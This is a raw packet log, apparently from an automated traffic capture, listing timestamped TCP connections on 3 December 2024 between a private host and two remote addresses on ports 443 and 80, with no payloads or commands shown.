                                                                                                            Dec 3, 2024 10:06:05.356010914 CET49755443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:05.356033087 CET4434975513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:05.356489897 CET49755443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:05.356493950 CET4434975513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:05.356686115 CET49752443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:05.356686115 CET49752443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:05.356750011 CET4434975213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:05.356777906 CET4434975213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:05.357770920 CET49753443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:05.357778072 CET4434975313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:05.358181000 CET49753443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:05.358185053 CET4434975313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:05.359790087 CET49757443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:05.359823942 CET4434975713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:05.360987902 CET49757443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:05.361095905 CET49757443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:05.361113071 CET4434975713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:05.607760906 CET4434975613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:05.608968019 CET49756443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:05.608994007 CET4434975613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:05.609441042 CET49756443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:05.609445095 CET4434975613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:05.639396906 CET4434975413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:05.639452934 CET4434975413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:05.639539003 CET49754443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:05.639720917 CET49754443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:05.639753103 CET4434975413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:05.639791965 CET49754443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:05.639799118 CET4434975413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:05.642416954 CET49758443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:05.642457008 CET4434975813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:05.642537117 CET49758443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:05.642653942 CET49758443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:05.642667055 CET4434975813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:05.790231943 CET4434975313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:05.790302038 CET4434975313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:05.790348053 CET49753443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:05.790672064 CET49753443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:05.790698051 CET4434975313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:05.790709972 CET49753443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:05.790714979 CET4434975313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:05.796433926 CET4434975513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:05.796492100 CET4434975513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:05.796530008 CET49755443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:05.796782017 CET49755443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:05.796793938 CET4434975513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:05.796803951 CET49755443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:05.796808004 CET4434975513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:05.801238060 CET49759443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:05.801274061 CET4434975913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:05.801337004 CET49759443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:05.804857016 CET49760443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:05.804902077 CET4434976013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:05.804954052 CET49760443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:05.805171013 CET49759443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:05.805197954 CET4434975913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:05.805372953 CET49760443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:05.805386066 CET4434976013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:06.061506033 CET4434975613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:06.061578989 CET4434975613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:06.061629057 CET49756443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:06.061800957 CET49756443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:06.061825037 CET4434975613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:06.061837912 CET49756443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:06.061842918 CET4434975613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:06.064516068 CET49761443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:06.064565897 CET4434976113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:06.064644098 CET49761443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:06.064798117 CET49761443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:06.064814091 CET4434976113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:07.141962051 CET4434975713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:07.142498970 CET49757443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:07.142529011 CET4434975713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:07.142940044 CET49757443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:07.142950058 CET4434975713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:07.436398029 CET4434975813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:07.438384056 CET49758443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:07.438420057 CET4434975813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:07.438839912 CET49758443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:07.438846111 CET4434975813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:07.542447090 CET4972480192.168.2.4199.232.214.172
                                                                                                            Dec 3, 2024 10:06:07.547413111 CET4434975913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:07.548233032 CET49759443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:07.548252106 CET4434975913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:07.549000025 CET49759443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:07.549005032 CET4434975913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:07.594119072 CET4434975713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:07.594187021 CET4434975713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:07.594228983 CET49757443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:07.595035076 CET49757443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:07.595057964 CET4434975713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:07.595071077 CET49757443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:07.595077038 CET4434975713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:07.595921993 CET4434976013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:07.596594095 CET49760443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:07.596631050 CET4434976013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:07.597045898 CET49760443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:07.597052097 CET4434976013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:07.599077940 CET49762443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:07.599112034 CET4434976213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:07.599175930 CET49762443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:07.599278927 CET49762443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:07.599291086 CET4434976213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:07.662808895 CET8049724199.232.214.172192.168.2.4
                                                                                                            Dec 3, 2024 10:06:07.662872076 CET4972480192.168.2.4199.232.214.172
                                                                                                            Dec 3, 2024 10:06:07.846842051 CET4434976113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:07.847609997 CET49761443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:07.847640038 CET4434976113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:07.848066092 CET49761443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:07.848072052 CET4434976113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:07.883812904 CET4434975813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:07.883876085 CET4434975813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:07.886390924 CET49758443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:07.889148951 CET49758443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:07.889192104 CET4434975813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:07.889219046 CET49758443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:07.889234066 CET4434975813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:07.891638041 CET49763443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:07.891670942 CET4434976313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:07.891735077 CET49763443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:07.891916990 CET49763443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:07.891928911 CET4434976313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:07.982238054 CET4434975913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:07.982292891 CET4434975913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:07.982363939 CET49759443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:07.982449055 CET49759443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:07.982470989 CET4434975913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:07.982485056 CET49759443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:07.982489109 CET4434975913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:07.985136032 CET49764443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:07.985167980 CET4434976413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:07.985271931 CET49764443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:07.985414028 CET49764443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:07.985425949 CET4434976413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:08.039428949 CET4434976013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:08.039510012 CET4434976013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:08.039690018 CET49760443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:08.041574955 CET49760443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:08.041594982 CET4434976013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:08.047013998 CET49765443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:08.047055006 CET4434976513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:08.047128916 CET49765443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:08.047533035 CET49765443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:08.047545910 CET4434976513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:08.291752100 CET4434976113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:08.291836977 CET4434976113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:08.291897058 CET49761443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:08.295351028 CET49761443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:08.295368910 CET4434976113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:08.295397043 CET49761443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:08.295402050 CET4434976113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:08.318917036 CET49766443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:08.318954945 CET4434976613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:08.319006920 CET49766443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:08.319351912 CET49766443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:08.319363117 CET4434976613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:09.445571899 CET4434976213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:09.458355904 CET49762443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:09.458383083 CET4434976213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:09.458916903 CET49762443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:09.458923101 CET4434976213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:09.673379898 CET4434976313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:09.673856974 CET49763443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:09.673902035 CET4434976313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:09.674302101 CET49763443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:09.674309015 CET4434976313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:09.701596022 CET4434976413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:09.702111006 CET49764443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:09.702131987 CET4434976413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:09.702524900 CET49764443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:09.702532053 CET4434976413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:09.892959118 CET4434976513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:09.893512964 CET49765443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:09.893527985 CET4434976513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:09.893976927 CET49765443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:09.893980980 CET4434976513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:09.898561001 CET4434976213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:09.898643017 CET4434976213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:09.898700953 CET49762443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:09.898945093 CET49762443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:09.898966074 CET4434976213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:09.898974895 CET49762443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:09.898979902 CET4434976213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:09.904715061 CET49767443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:09.904750109 CET4434976713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:09.904813051 CET49767443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:09.905199051 CET49767443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:09.905210018 CET4434976713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:10.034353018 CET4434976613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:10.034931898 CET49766443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:10.034944057 CET4434976613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:10.035444975 CET49766443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:10.035453081 CET4434976613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:10.117192030 CET4434976313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:10.117292881 CET4434976313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:10.117361069 CET49763443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:10.117646933 CET49763443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:10.117674112 CET4434976313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:10.117697001 CET49763443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:10.117702961 CET4434976313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:10.121134043 CET49768443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:10.121182919 CET4434976813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:10.121249914 CET49768443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:10.121449947 CET49768443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:10.121465921 CET4434976813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:10.137748957 CET4434976413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:10.137820959 CET4434976413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:10.138397932 CET49764443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:10.138442039 CET49764443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:10.138442039 CET49764443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:10.138462067 CET4434976413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:10.138469934 CET4434976413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:10.162367105 CET49769443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:10.162415028 CET4434976913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:10.162478924 CET49769443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:10.162784100 CET49769443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:10.162801981 CET4434976913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:10.347773075 CET4434976513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:10.347875118 CET4434976513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:10.347956896 CET49765443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:10.348215103 CET49765443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:10.348229885 CET4434976513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:10.348242998 CET49765443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:10.348252058 CET4434976513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:10.351430893 CET49770443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:10.351470947 CET4434977013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:10.351547956 CET49770443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:10.351706028 CET49770443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:10.351716995 CET4434977013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:10.471249104 CET4434976613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:10.471344948 CET4434976613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:10.471507072 CET49766443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:10.471735001 CET49766443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:10.471735954 CET49766443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:10.471764088 CET4434976613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:10.471774101 CET4434976613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:10.474613905 CET49771443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:10.474667072 CET4434977113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:10.474742889 CET49771443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:10.474899054 CET49771443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:10.474914074 CET4434977113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:11.744828939 CET4434976913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:11.749439955 CET49769443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:11.749466896 CET4434976913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:11.749963999 CET49769443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:11.749969959 CET4434976913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:11.750438929 CET4434976713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:11.752985954 CET49767443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:11.753011942 CET4434976713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:11.754241943 CET49767443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:11.754249096 CET4434976713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:11.904454947 CET4434976813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:11.905514002 CET49768443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:11.905540943 CET4434976813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:11.906109095 CET49768443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:11.906121016 CET4434976813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:12.190211058 CET4434976913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:12.190294027 CET4434976913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:12.190463066 CET49769443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:12.190785885 CET49769443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:12.190804958 CET4434976913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:12.190821886 CET49769443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:12.190828085 CET4434976913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:12.191220045 CET4434977113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:12.192459106 CET49771443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:12.192477942 CET4434977113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:12.192934990 CET49771443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:12.192939997 CET4434977113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:12.194720984 CET49772443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:12.194783926 CET4434977213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:12.194861889 CET49772443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:12.194963932 CET49772443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:12.194978952 CET4434977213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:12.195775986 CET4434977013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:12.204977989 CET4434976713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:12.205050945 CET4434976713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:12.205112934 CET49767443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:12.205502987 CET49770443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:12.205534935 CET4434977013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:12.205946922 CET49770443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:12.205955982 CET4434977013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:12.206110954 CET49767443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:12.206129074 CET4434976713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:12.206140995 CET49767443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:12.206145048 CET4434976713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:12.223579884 CET49773443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:12.223684072 CET4434977313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:12.223782063 CET49773443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:12.223978996 CET49773443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:12.224011898 CET4434977313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:12.349401951 CET4434976813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:12.349478006 CET4434976813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:12.349657059 CET49768443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:12.349986076 CET49768443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:12.350006104 CET4434976813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:12.350023031 CET49768443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:12.350028038 CET4434976813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:12.358658075 CET49774443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:12.358705997 CET4434977413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:12.358779907 CET49774443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:12.359127998 CET49774443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:12.359138012 CET4434977413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:12.626589060 CET4434977113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:12.626667976 CET4434977113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:12.626727104 CET49771443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:12.627064943 CET49771443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:12.627084970 CET4434977113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:12.627094984 CET49771443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:12.627099991 CET4434977113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:12.631009102 CET49775443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:12.631052971 CET4434977513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:12.631140947 CET49775443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:12.631284952 CET49775443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:12.631299019 CET4434977513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:12.649399042 CET4434977013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:12.649462938 CET4434977013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:12.649524927 CET49770443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:12.649777889 CET49770443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:12.649777889 CET49770443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:12.649792910 CET4434977013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:12.649804115 CET4434977013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:12.652451038 CET49776443192.168.2.413.107.246.63
